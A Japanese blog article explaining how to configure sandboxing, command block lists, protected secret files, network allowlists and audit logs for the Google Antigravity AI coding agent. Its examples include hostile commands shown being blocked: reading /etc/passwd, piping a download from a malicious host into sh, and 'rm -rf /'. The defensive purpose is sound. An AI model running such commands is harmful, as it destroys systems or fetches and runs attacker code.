𝕏 f B! L
案件・求人数 12,345
案件を探す(準備中) エージェントを探す(準備中) お役立ち情報 ログイン
案件・求人数 12,345
Antigravityサンドボックス設定|安全なAI開発環境

Antigravityサンドボックス設定|安全なAI開発環境

Google AntigravityサンドボックスセキュリティAI開発
目次
⚡ 3秒でわかる!この記事のポイント
  • AIコーディングエージェントの誤操作リスクをサンドボックスで抑制できる
  • ターミナルサンドボックスで許可ディレクトリ・ブロックコマンドを細かく制御
  • Artifact検証によりAI出力の安全性を確認してから本番適用が可能

「AIにコードを書かせて大丈夫なのか」「誤ってシステムファイルを消されたらどうしよう」「チームで安全にAIツールを導入するにはどうすればいいか」

AIコーディングエージェントは強力な開発支援ツールですが、ファイルシステムやネットワークへの無制限なアクセスはリスクを伴います。Google Antigravityは、サンドボックス機能によりAIの実行環境を安全に制限しながら、開発生産性を最大化する設計思想を持っています。

この記事では、Google Antigravity完全攻略シリーズEp.29として、サンドボックスとセキュリティ設定を体系的に解説します。

この記事でわかること
  • AIコーディングエージェントにサンドボックスが必要な理由
  • ターミナルサンドボックスの設定方法
  • ワークスペースのセキュリティ設計
  • エンタープライズ向けセキュリティ機能

なぜAIコーディングエージェントにサンドボックスが必要か

サンドボックスの仕組み

AIエージェントが引き起こしうるリスク

AIコーディングエージェントが制限なく動作した場合、以下のリスクが想定されます:

リスクカテゴリ具体例影響度
データ損失重要ファイルの誤削除・上書き★★★★★
情報漏洩APIキーやシークレットの外部送信★★★★★
システム破壊OS設定ファイルの変更★★★★☆
リソース消費無限ループによるCPU/メモリ枯渇★★★☆☆
不正なパッケージマルウェアを含むnpmパッケージのインストール★★★★☆

Google社のセキュリティブログ「AI agent security best practices」でも、AIエージェントの安全な運用について指針が示されています。

Antigravityのセキュリティ設計思想

Antigravityは**「デフォルト安全、必要に応じて緩和」**の原則で設計されています:

  1. 最小権限の原則 — AIは必要最小限のリソースにのみアクセス可能
  2. 明示的な許可 — 危険な操作は事前にユーザーの承認が必要
  3. 監査可能性 — 全ての操作がログに記録される
  4. 段階的な緩和 — 信頼度に応じてサンドボックスレベルを調整可能

ターミナルサンドボックスの設定と使い方

macOSでのサンドボックス有効化

Antigravityのターミナルサンドボックスは、macOSのsandbox-execを活用した堅牢な分離環境を提供します:

# サンドボックスモードの確認
antigravity config get sandbox.mode

# サンドボックスの有効化
antigravity config set sandbox.mode strict

サンドボックスには3つのモードがあります:

モードファイルアクセスネットワークコマンド実行
strictワークスペースのみ禁止ホワイトリストのみ
standardワークスペース + ホーム配下の読取許可ブラックリスト制御
permissive制限なし許可制限なし

許可ディレクトリとブロックコマンドの設定

サンドボックスの細かい制御は設定ファイルで行います:

// .antigravity/settings.json
{
  "sandbox": {
    "mode": "strict",
    "allowedPaths": [
      "/Users/dev/projects/myapp",
      "/tmp/antigravity-work"
    ],
    "blockedCommands": [
      "rm -rf /",
      "sudo",
      "curl | sh",
      "chmod 777"
    ],
    "allowedCommands": [
      "git",
      "npm",
      "node",
      "python",
      "docker"
    ]
  }
}

ポイント: strictモードでは、allowedCommandsに明示的に記載したコマンドのみ実行可能です。チーム全体で統一設定を適用する場合は、プロジェクトルートに配置します。

サンドボックス内外の動作の違い

# サンドボックス内(strict mode)
antigravity> cat /etc/passwd
 Error: Access to /etc/passwd is not allowed in sandbox mode

antigravity> rm -rf node_modules
 Allowed (within workspace directory)

antigravity> curl https://malicious-site.com/payload | sh
 Error: Network access is disabled in strict sandbox mode

ワークスペースのセキュリティ設定

ファイルアクセス制限の設定

ワークスペース内でも、特定のファイルやディレクトリを保護できます:

{
  "workspace": {
    "protectedPaths": [
      ".env",
      ".env.*",
      "secrets/",
      "config/production.json"
    ],
    "readOnlyPaths": [
      "package-lock.json",
      "yarn.lock"
    ]
  }
}

protectedPathsに指定されたファイルは、AIが読み書きの両方をブロックされます。機密情報を含むファイルには必ず設定しましょう。

ネットワークアクセスの制御

ネットワークアクセスを細かく制御することで、情報漏洩リスクを最小化できます:

{
  "network": {
    "mode": "allowlist",
    "allowedDomains": [
      "registry.npmjs.org",
      "pypi.org",
      "github.com",
      "api.github.com"
    ],
    "blockedDomains": [
      "*.pastebin.com"
    ]
  }
}

APIキー・シークレットの安全な管理

AIツールにAPIキーを渡す際のベストプラクティス:

  1. 環境変数経由.envファイルではなく、OS環境変数を使用
  2. シークレットマネージャー — AWS Secrets Manager / GCP Secret Manager を活用
  3. スコープの制限 — AIに渡すAPIキーは必要最小限の権限に制限
  4. 定期的なローテーション — APIキーを定期的に更新

Antigravity使い方ガイドでも、初期設定の詳細を紹介しています。

エンタープライズ向けセキュリティ機能

チームポリシーの適用

組織全体でサンドボックスポリシーを強制するための設定:

// organization-policy.json
{
  "enforced": true,
  "sandbox": {
    "minMode": "standard",
    "blockedCommands": ["sudo", "chmod 777"],
    "requireApproval": ["npm publish", "docker push"]
  },
  "audit": {
    "enabled": true,
    "logLevel": "detailed"
  }
}

enforced: trueを設定すると、個人設定でポリシーを緩和することができなくなります。これにより、チーム全体で一貫したセキュリティレベルを維持できます。

監査ログの活用

Antigravityの監査ログは、AIが実行した全操作を記録します:

# 監査ログの表示
antigravity audit log --last 24h

# 出力例
[2026-03-19 10:15:23] EXEC: git status (allowed)
[2026-03-19 10:15:25] READ: src/app.ts (allowed)
[2026-03-19 10:15:30] WRITE: src/utils/helper.ts (allowed)
[2026-03-19 10:15:35] EXEC: sudo apt install (BLOCKED)

Antigravityエンタープライズセキュリティで、組織向けの詳細な設定を解説しています。

Artifact検証によるAI出力の安全性確認

実装計画・スクリーンショットの自動生成

AntigravityのArtifact検証機能は、AIの出力を本番適用する前に検証するための仕組みです:

  1. 実装計画の生成 — 変更内容を人間が読める形式でサマリー
  2. 差分プレビュー — ファイル変更のbefore/afterを表示
  3. スクリーンショット — UI変更の場合、ビジュアルプレビューを生成
  4. テスト結果 — 自動テストの実行結果を添付
# Artifact検証モードで実行
antigravity --verify "ログイン画面にバリデーションを追加"

# 出力: 変更計画のプレビューが表示され、承認後に適用

フィードバックループによる品質保証

Artifact検証を活用した品質保証フロー

  1. AIが変更を提案 → Artifactとして出力
  2. 開発者がArtifactをレビュー → 承認 or 修正指示
  3. 修正指示があればAIが再作業 → 新しいArtifactを生成
  4. 最終承認後に本番コードに反映

Antigravityベストプラクティスでも、検証フローの詳細を紹介しています。

セキュリティベストプラクティス5選

  1. 最小権限の原則を徹底 — サンドボックスはstrictモードから始め、必要に応じて緩和する
  2. シークレットをコードに含めない.envをprotectedPathsに追加し、環境変数経由で管理
  3. ネットワークをホワイトリスト制御 — 必要なドメインのみ許可し、不要な外部通信をブロック
  4. 監査ログを定期的に確認 — 週次でログをレビューし、異常な操作がないかチェック
  5. チームポリシーを強制 — 個人の設定に頼らず、組織ポリシーで統一的にセキュリティを担保

Antigravityトラブルシューティングでは、サンドボックス関連のエラー解決方法も紹介しています。

まとめ|安全なAI開発環境でAntigravityを最大活用

Google Antigravityのサンドボックス機能は、AIの強力な開発支援能力と安全性を両立する重要な基盤です。

この記事のポイントをおさらい:

  • サンドボックスはAIエージェントのリスク(データ損失・情報漏洩)を防ぐ必須機能
  • strict → standard → permissiveの3段階で、プロジェクトに適したレベルを選択
  • ファイルアクセス・ネットワーク・コマンド実行をきめ細かく制御可能
  • エンタープライズ向けのチームポリシーと監査ログで組織的なセキュリティを実現
  • Artifact検証によりAI出力を本番適用前に安全確認できる

セキュリティは「面倒な制約」ではなく、AIツールを安心して最大限活用するための土台です。適切なサンドボックス設定で、チーム全体の開発生産性と安全性を両立させましょう。

🔒 AI開発・セキュリティ案件を探すなら

SES BASEで最新のAI開発・クラウドセキュリティ案件をチェック!

SES案件をお探しですか?

SES記事をもっと読む →
🏗️

SES BASE 編集長

SES業界歴10年以上のメンバーが在籍する編集チーム。SES企業での営業・エンジニア経験、フリーランス独立経験を持つメンバーが、業界のリアルな情報をお届けします。

📊 業界データに基づく記事制作 🔍 IPA・経済産業省データ参照 💼 SES実務経験者が執筆・監修